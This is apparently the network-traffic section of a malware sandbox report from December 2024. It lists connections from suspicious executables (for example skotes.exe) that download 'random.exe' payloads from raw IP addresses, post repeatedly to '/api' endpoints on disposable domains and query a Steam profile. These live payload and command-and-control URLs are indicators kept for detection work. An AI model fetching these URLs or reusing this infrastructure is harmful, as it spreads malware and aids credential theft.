                        r4.sn-aigzrnsz.gvt1.com
                        IN AAAA
                        2a00:1450:4009:1b::9
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:33 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:35 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:37 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:40 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • Country: NL
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:45 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:47 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:49 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=98
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:48:51 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 1
                        Keep-Alive: timeout=5, max=97
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                      • flag-nl
                        GET
                        http://185.156.73.23/files/download
                        e0ef35828f.exe
                        Remote address:
                        185.156.73.23:80
                        Request
                        GET /files/download HTTP/1.1
                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                        User-Agent: C
                        Host: 185.156.73.23
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Connection records below are laid out as: destination | URL or domain | protocol | process | bytes out / packets out | bytes in / packets in, followed by the HTTP requests seen on that connection and the status code of the captured response. The out/in direction is inferred from the download and upload flows; the extracted page carried no column headers.
                      • 185.215.113.43:80 | http://185.215.113.43/Zu7JuNko/index.php | http | skotes.exe | out 7.5kB / 52 packets | in 7.0kB / 29 packets
                        POST http://185.215.113.43/Zu7JuNko/index.php -> 200 (20 request/response pairs, all identical)
                      • 31.41.244.11:80 | http://31.41.244.11/files/unique2/random.exe | http | skotes.exe | out 525.2kB / 11065 packets | in 29.7MB / 31100 packets
                        GET http://31.41.244.11/files/fate/random.exe -> 200
                        GET http://31.41.244.11/files/london/random.exe -> 200
                        GET http://31.41.244.11/files/wicked/random.exe -> 200
                        GET http://31.41.244.11/files/geopoxid/random.exe -> 200
                        GET http://31.41.244.11/files/unique3/random.exe -> 200
                        GET http://31.41.244.11/files/lolz/random.exe -> 200
                        GET http://31.41.244.11/files/burpin1/random.exe -> 200
                        GET http://31.41.244.11/files/unique1/random.exe -> 200
                        GET http://31.41.244.11/files/martin/random.exe -> 200
                        GET http://31.41.244.11/files/bckosq/random.exe -> 200
                        GET http://31.41.244.11/files/loadman/random.exe -> 200
                        GET http://31.41.244.11/files/x3team/random.exe -> 200
                        GET http://31.41.244.11/files/karl/random.exe -> 200
                        GET http://31.41.244.11/files/unique2/random.exe -> 200
                      • 172.67.209.202:443 | https://pancakedipyps.click/api | tls, http | 823e4bdbcb.exe | out 983 B / 9 packets | in 4.5kB / 9 packets
                        POST https://pancakedipyps.click/api -> 200
                      • 172.67.197.170:443 | https://discokeyus.lat/api | tls, http | 823e4bdbcb.exe | out 978 B / 9 packets | in 4.4kB / 9 packets
                        POST https://discokeyus.lat/api -> 200
                      • 172.67.215.121:443 | https://necklacebudi.lat/api | tls, http | 823e4bdbcb.exe | out 980 B / 9 packets | in 4.4kB / 9 packets
                        POST https://necklacebudi.lat/api -> 200
                      • 104.21.64.1:443 | https://energyaffai.lat/api | tls, http | 823e4bdbcb.exe | out 979 B / 9 packets | in 4.4kB / 9 packets
                        POST https://energyaffai.lat/api -> 200
                      • 172.67.157.253:443 | https://aspecteirs.lat/api | tls, http | 823e4bdbcb.exe | out 978 B / 9 packets | in 4.4kB / 9 packets
                        POST https://aspecteirs.lat/api -> 200
                      • 104.21.48.1:443 | https://sustainskelet.lat/api | tls, http | 823e4bdbcb.exe | out 981 B / 9 packets | in 4.5kB / 9 packets
                        POST https://sustainskelet.lat/api -> 200
                      • 172.67.180.113:443 | https://treehoneyi.click/api | tls, http | fcc74b3f6b.exe | out 980 B / 9 packets | in 4.4kB / 9 packets
                        POST https://treehoneyi.click/api -> 200
                      • 104.21.52.127:443 | https://crosshuaht.lat/api | tls, http | 823e4bdbcb.exe | out 978 B / 9 packets | in 4.4kB / 9 packets
                        POST https://crosshuaht.lat/api -> 200
                      • 172.67.197.170:443 | https://discokeyus.lat/api | tls, http | fcc74b3f6b.exe | out 978 B / 9 packets | in 4.4kB / 9 packets
                        POST https://discokeyus.lat/api -> 200
                      • 23.214.143.155:443 | https://steamcommunity.com/profiles/76561199724331900 | tls, http | 823e4bdbcb.exe | out 1.4kB / 20 packets | in 33.1kB / 31 packets
                        GET https://steamcommunity.com/profiles/76561199724331900 -> 200
                      • 172.67.215.121:443 | https://necklacebudi.lat/api | tls, http | fcc74b3f6b.exe | out 980 B / 9 packets | in 4.4kB / 9 packets
                        POST https://necklacebudi.lat/api -> 200
                      • 104.21.64.1:443 | https://energyaffai.lat/api | tls, http | fcc74b3f6b.exe | out 979 B / 9 packets | in 4.4kB / 9 packets
                        POST https://energyaffai.lat/api -> 200
                      • 172.67.157.253:443 | https://aspecteirs.lat/api | tls, http | fcc74b3f6b.exe | out 974 B / 9 packets | in 4.4kB / 9 packets
                        POST https://aspecteirs.lat/api -> 200
                      • 104.21.48.1:443 | https://sustainskelet.lat/api | tls, http | fcc74b3f6b.exe | out 977 B / 9 packets | in 4.5kB / 9 packets
                        POST https://sustainskelet.lat/api -> 200
                      • 104.21.52.127:443 | https://crosshuaht.lat/api | tls, http | fcc74b3f6b.exe | out 974 B / 9 packets | in 4.4kB / 9 packets
                        POST https://crosshuaht.lat/api -> 200
                      • 23.214.143.155:443 | https://steamcommunity.com/profiles/76561199724331900 | tls, http | fcc74b3f6b.exe | out 1.5kB / 23 packets | in 42.9kB / 37 packets
                        GET https://steamcommunity.com/profiles/76561199724331900 -> 200
                      • 172.67.157.254:443 | https://lev-tolstoi.com/api | tls, http | fcc74b3f6b.exe | out 979 B / 9 packets | in 4.5kB / 9 packets
                        POST https://lev-tolstoi.com/api -> 200
                      • 172.67.177.88:443 | https://cheapptaxysu.click/api | tls, http | 4ab1990554.exe | out 1.7kB / 14 packets | in 10.0kB / 16 packets
                        POST https://cheapptaxysu.click/api -> 403
                        POST https://cheapptaxysu.click/api -> 200
                      • 20.26.156.215:443 | github.com | tls | 7e8e0935c9.exe | out 344 B / 5 packets | in 179 B / 4 packets
                      • 98.85.100.80:443 | httpbin.org | tls | 16d019449f.exe | out 1.5kB / 14 packets | in 6.5kB / 16 packets
                      • 147.45.113.159:80 | http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | http | 16d019449f.exe | out 82.6kB / 63 packets | in 1.9kB / 36 packets
                        POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 (no response captured)
                      • 45.77.249.79:443 | immureprech.biz | tls | d5ca7bb125.exe | out 349 B / 5 packets | in 219 B / 5 packets
                      • 45.77.249.79:443 | immureprech.biz | tls | d5ca7bb125.exe | out 288 B / 5 packets | in 219 B / 5 packets
                      • 45.77.249.79:443 | deafeninggeh.biz | tls | d5ca7bb125.exe | out 350 B / 5 packets | in 179 B / 4 packets
                      • 45.77.249.79:443 | deafeninggeh.biz | tls | d5ca7bb125.exe | out 288 B / 5 packets | in 219 B / 5 packets
                      • 23.214.143.155:443 | https://steamcommunity.com/profiles/76561199724331900 | tls, http | d5ca7bb125.exe | out 1.5kB / 21 packets | in 42.9kB / 36 packets
                        GET https://steamcommunity.com/profiles/76561199724331900 -> 200
                      • 172.67.157.254:443 | https://lev-tolstoi.com/api | tls, http | d5ca7bb125.exe | out 1.2kB / 12 packets | in 4.5kB / 10 packets
                        POST https://lev-tolstoi.com/api -> 200
                      • 185.215.113.16:80 | http://185.215.113.16/off/random.exe | http | skotes.exe | out 150.2kB / 3148 packets | in 8.8MB / 6322 packets
                        GET http://185.215.113.16/luma/random.exe -> 200
                        GET http://185.215.113.16/steam/random.exe -> 200
                        GET http://185.215.113.16/well/random.exe -> 200
                        GET http://185.215.113.16/off/random.exe -> 200
                      • 20.26.156.215:443 | github.com | tls | e57707a59c.exe | out 344 B / 5 packets | in 179 B / 4 packets
                      • 20.26.156.215:443 | github.com | tls | e57707a59c.exe | out 344 B / 5 packets | in 179 B / 4 packets
                      • 172.67.197.170:443 | https://discokeyus.lat/api | tls, http | dee2c68b58.exe | out 1.0kB / 10 packets | in 4.5kB / 10 packets
                        POST https://discokeyus.lat/api -> 200
                      • 172.67.215.121:443 | https://necklacebudi.lat/api | tls, http | dee2c68b58.exe | out 1.0kB / 10 packets | in 4.4kB / 9 packets
                        POST https://necklacebudi.lat/api -> 200
                      • 104.21.64.1:443 | https://energyaffai.lat/api | tls, http | dee2c68b58.exe | out 1.2kB / 11 packets | in 4.5kB / 10 packets
                        POST https://energyaffai.lat/api -> 200
                      • 185.215.113.206:80 | http://185.215.113.206/c4becf79229cb002.php | http | 718410bf88.exe | out 727 B / 5 packets | in 625 B / 5 packets
                        GET http://185.215.113.206/ -> 200
                        POST http://185.215.113.206/c4becf79229cb002.php -> 200
                      • 172.67.157.253:443 | https://aspecteirs.lat/api | tls, http | dee2c68b58.exe | out 978 B / 9 packets | in 4.4kB / 9 packets
                        POST https://aspecteirs.lat/api -> 200
                      • 104.21.48.1:443 | https://sustainskelet.lat/api | tls, http | dee2c68b58.exe | out 1.6kB / 16 packets | in 4.8kB / 13 packets
                        POST https://sustainskelet.lat/api -> 200
                      • 147.45.113.159:80 | http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | http | 16d019449f.exe | out 28.6kB / 24 packets | in 678 B / 9 packets
                        POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 -> 504
                      • 104.21.52.127:443 | https://crosshuaht.lat/api | tls, http | dee2c68b58.exe | out 1.9kB / 14 packets | in 4.5kB / 10 packets
                        POST https://crosshuaht.lat/api -> 200
                      • 127.0.0.1:51775 | firefox.exe
                      • 127.0.0.1:51782 | firefox.exe
                      • 172.217.18.206:443 | https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd | tls, http2 | firefox.exe | out 6.0kB / 17 packets | in 7.2kB / 13 packets
                        GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd (no response captured)
                      • 34.120.5.221:443 | https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 | tls, http2 | firefox.exe | out 3.0kB / 18 packets | in 12.8kB / 19 packets
                        GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 (no response captured)
                      • 34.120.5.221:443 | getpocket.cdn.mozilla.net | (no protocol listed) | firefox.exe | 152 B | 3 (only these two values are recorded for this connection)
                      • 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tls | firefox.exe | out 1.9kB / 20 packets | in 21.3kB / 26 packets
                      • 23.214.143.155:443 | https://steamcommunity.com/profiles/76561199724331900 | tls, http | dee2c68b58.exe | out 1.7kB / 23 packets | in 43.9kB / 37 packets
                        GET https://steamcommunity.com/profiles/76561199724331900 -> 200
                      • 172.67.157.254:443 | https://lev-tolstoi.com/api | tls, http | dee2c68b58.exe | out 975 B / 9 packets | in 4.4kB / 9 packets
                        POST https://lev-tolstoi.com/api -> 200
                      • 185.156.73.23:80 | http://185.156.73.23/files/download | http | e0ef35828f.exe | out 5.8kB / 42 packets | in 101.8kB / 85 packets
                        GET http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp -> 200
                        GET http://185.156.73.23/dll/key -> 200
                        GET http://185.156.73.23/dll/download -> 200
                        GET http://185.156.73.23/files/download -> 200
                        GET http://185.156.73.23/files/download -> 200
                        GET http://185.156.73.23/files/download (no response captured)
                      • 88.221.134.155:80 | http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip | http | firefox.exe | out 5.3kB / 109 packets | in 468.6kB / 343 packets
                        GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip -> 200
                      • 172.217.20.174:443
                        redirector.gvt1.com
                        tls
                        firefox.exe
                        2.2kB
                        9.0kB
                        19
                        22
                      • 74.125.175.169:443
                        r4---sn-aigzrnsz.gvt1.com
                        tls
                        firefox.exe
                        230.3kB
                        8.7MB
                        3698
                        6242
                      • 185.156.73.23:80
                        http://185.156.73.23/files/download
                        http
                        e0ef35828f.exe
                        4.9kB
                        1.4kB
                        22
                        14

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download
                      • 185.156.73.23:80
                        http://185.156.73.23/files/download
                        http
                        e0ef35828f.exe
                        3.5kB
                        1.9kB
                        16
                        12

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download

                        HTTP Response

                        200

                        HTTP Request

                        GET http://185.156.73.23/files/download
                      • 8.8.8.8:53
                        pancakedipyps.click
                        dns
                        823e4bdbcb.exe
                        65 B
                        97 B
                        1
                        1

                        DNS Request

                        pancakedipyps.click

                        DNS Response

                        172.67.209.202
                        104.21.23.76

                      • 8.8.8.8:53
                        grannyejh.lat
                        dns
                        dee2c68b58.exe
                        59 B
                        124 B
                        1
                        1

                        DNS Request

                        grannyejh.lat

                      • 8.8.8.8:53
                        discokeyus.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        discokeyus.lat

                        DNS Response

                        172.67.197.170
                        104.21.21.99

                      • 8.8.8.8:53
                        necklacebudi.lat
                        dns
                        dee2c68b58.exe
                        62 B
                        94 B
                        1
                        1

                        DNS Request

                        necklacebudi.lat

                        DNS Response

                        172.67.215.121
                        104.21.50.254

                      • 8.8.8.8:53
                        treehoneyi.click
                        dns
                        fcc74b3f6b.exe
                        124 B
                        94 B
                        2
                        1

                        DNS Request

                        treehoneyi.click

                        DNS Request

                        treehoneyi.click

                        DNS Response

                        172.67.180.113
                        104.21.91.209

                      • 8.8.8.8:53
                        energyaffai.lat
                        dns
                        dee2c68b58.exe
                        61 B
                        173 B
                        1
                        1

                        DNS Request

                        energyaffai.lat

                        DNS Response

                        104.21.64.1
                        104.21.96.1
                        104.21.48.1
                        104.21.80.1
                        104.21.16.1
                        104.21.112.1
                        104.21.32.1

                      • 8.8.8.8:53
                        aspecteirs.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        aspecteirs.lat

                        DNS Response

                        172.67.157.253
                        104.21.66.85

                      • 8.8.8.8:53
                        sustainskelet.lat
                        dns
                        dee2c68b58.exe
                        63 B
                        175 B
                        1
                        1

                        DNS Request

                        sustainskelet.lat

                        DNS Response

                        104.21.48.1
                        104.21.32.1
                        104.21.80.1
                        104.21.64.1
                        104.21.112.1
                        104.21.16.1
                        104.21.96.1

                      • 8.8.8.8:53
                        crosshuaht.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        92 B
                        1
                        1

                        DNS Request

                        crosshuaht.lat

                        DNS Response

                        104.21.52.127
                        172.67.199.59

                      • 8.8.8.8:53
                        rapeflowwj.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        125 B
                        1
                        1

                        DNS Request

                        rapeflowwj.lat

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        64 B
                        80 B
                        1
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        lev-tolstoi.com
                        dns
                        dee2c68b58.exe
                        61 B
                        93 B
                        1
                        1

                        DNS Request

                        lev-tolstoi.com

                        DNS Response

                        172.67.157.254
                        104.21.66.86

                      • 8.8.8.8:53
                        cheapptaxysu.click
                        dns
                        4ab1990554.exe
                        64 B
                        96 B
                        1
                        1

                        DNS Request

                        cheapptaxysu.click

                        DNS Response

                        172.67.177.88
                        104.21.67.146

                      • 8.8.8.8:53
                        github.com
                        dns
                        e57707a59c.exe
                        56 B
                        72 B
                        1
                        1

                        DNS Request

                        github.com

                        DNS Response

                        20.26.156.215

                      • 8.8.8.8:53
                        httpbin.org
                        dns
                        16d019449f.exe
                        160 B
                        250 B
                        2
                        2

                        DNS Request

                        httpbin.org

                        DNS Request

                        httpbin.org

                        DNS Response

                        98.85.100.80
                        34.226.108.155

                      • 8.8.8.8:53
                        home.twentytk20pn.top
                        dns
                        16d019449f.exe
                        180 B
                        232 B
                        2
                        2

                        DNS Request

                        home.twentytk20pn.top

                        DNS Request

                        home.twentytk20pn.top

                        DNS Response

                        147.45.113.159

                      • 8.8.8.8:53
                        bellflamre.click
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        bellflamre.click

                      • 8.8.8.8:53
                        immureprech.biz
                        dns
                        d5ca7bb125.exe
                        61 B
                        109 B
                        1
                        1

                        DNS Request

                        immureprech.biz

                        DNS Response

                        45.77.249.79
                        104.131.68.180
                        178.62.201.34

                      • 8.8.8.8:53
                        deafeninggeh.biz
                        dns
                        d5ca7bb125.exe
                        62 B
                        110 B
                        1
                        1

                        DNS Request

                        deafeninggeh.biz

                        DNS Response

                        45.77.249.79
                        178.62.201.34
                        104.131.68.180

                      • 8.8.8.8:53
                        effecterectz.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        effecterectz.xyz

                      • 8.8.8.8:53
                        diffuculttan.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        diffuculttan.xyz

                      • 8.8.8.8:53
                        debonairnukk.xyz
                        dns
                        d5ca7bb125.exe
                        62 B
                        127 B
                        1
                        1

                        DNS Request

                        debonairnukk.xyz

                      • 8.8.8.8:53
                        wrathful-jammy.cyou
                        dns
                        d5ca7bb125.exe
                        65 B
                        130 B
                        1
                        1

                        DNS Request

                        wrathful-jammy.cyou

                      • 8.8.8.8:53
                        awake-weaves.cyou
                        dns
                        d5ca7bb125.exe
                        63 B
                        128 B
                        1
                        1

                        DNS Request

                        awake-weaves.cyou

                      • 8.8.8.8:53
                        sordid-snaked.cyou
                        dns
                        d5ca7bb125.exe
                        64 B
                        129 B
                        1
                        1

                        DNS Request

                        sordid-snaked.cyou

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        64 B
                        80 B
                        1
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        sweepyribs.lat
                        dns
                        dee2c68b58.exe
                        60 B
                        125 B
                        1
                        1

                        DNS Request

                        sweepyribs.lat

                      • 8.8.8.8:53
                        home.twentytk20pn.top
                        dns
                        16d019449f.exe
                        180 B
                        232 B
                        2
                        2

                        DNS Request

                        home.twentytk20pn.top

                        DNS Request

                        home.twentytk20pn.top

                        DNS Response

                        147.45.113.159

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        73 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        172.217.18.206

                      • 8.8.8.8:53
                        spocs.getpocket.com
                        dns
                        firefox.exe
                        130 B
                        131 B
                        2
                        1

                        DNS Request

                        spocs.getpocket.com

                        DNS Request

                        spocs.getpocket.com

                        DNS Response

                        34.117.188.166

                      • 8.8.8.8:53
                        getpocket.cdn.mozilla.net
                        dns
                        firefox.exe
                        142 B
                        174 B
                        2
                        1

                        DNS Request

                        getpocket.cdn.mozilla.net

                        DNS Request

                        getpocket.cdn.mozilla.net

                        DNS Response

                        34.120.5.221

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        73 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        172.217.18.206

                      • 8.8.8.8:53
                        youtube.com
                        dns
                        firefox.exe
                        57 B
                        85 B
                        1
                        1

                        DNS Request

                        youtube.com

                        DNS Response

                        2a00:1450:4007:805::200e

                      • 8.8.8.8:53
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        206 B
                        119 B
                        2
                        1

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Response

                        34.160.144.191

                      • 8.8.8.8:53
                        shavar.prod.mozaws.net
                        dns
                        firefox.exe
                        204 B
                        116 B
                        3
                        1

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Response

                        44.228.225.150
                        52.40.120.141
                        44.240.87.158

                      • 8.8.8.8:53
                        prod.content-signature-chains.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        103 B
                        131 B
                        1
                        1

                        DNS Request

                        prod.content-signature-chains.prod.webservices.mozgcp.net

                        DNS Response

                        2600:1901:0:92a9::

                      • 8.8.8.8:53
                        prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        188 B
                        110 B
                        2
                        1

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

                        DNS Response

                        34.149.100.209

                      • 8.8.8.8:53
                        firefox-settings-attachments.cdn.mozilla.net
                        dns
                        firefox.exe
                        90 B
                        177 B
                        1
                        1

                        DNS Request

                        firefox-settings-attachments.cdn.mozilla.net

                        DNS Response

                        34.117.121.53

                      • 8.8.8.8:53
                        steamcommunity.com
                        dns
                        dee2c68b58.exe
                        192 B
                        80 B
                        3
                        1

                        DNS Request

                        steamcommunity.com

                        DNS Request

                        steamcommunity.com

                        DNS Request

                        steamcommunity.com

                        DNS Response

                        23.214.143.155

                      • 8.8.8.8:53
                        shavar.prod.mozaws.net
                        dns
                        firefox.exe
                        136 B
                        153 B
                        2
                        1

                        DNS Request

                        shavar.prod.mozaws.net

                        DNS Request

                        shavar.prod.mozaws.net

                      • 8.8.8.8:53
                        prod.remote-settings.prod.webservices.mozgcp.net
                        dns
                        firefox.exe
                        282 B
                        187 B
                        3
                        1

                        DNS Request

                        prod.remote-settings.prod.webservices.mozgcp.net

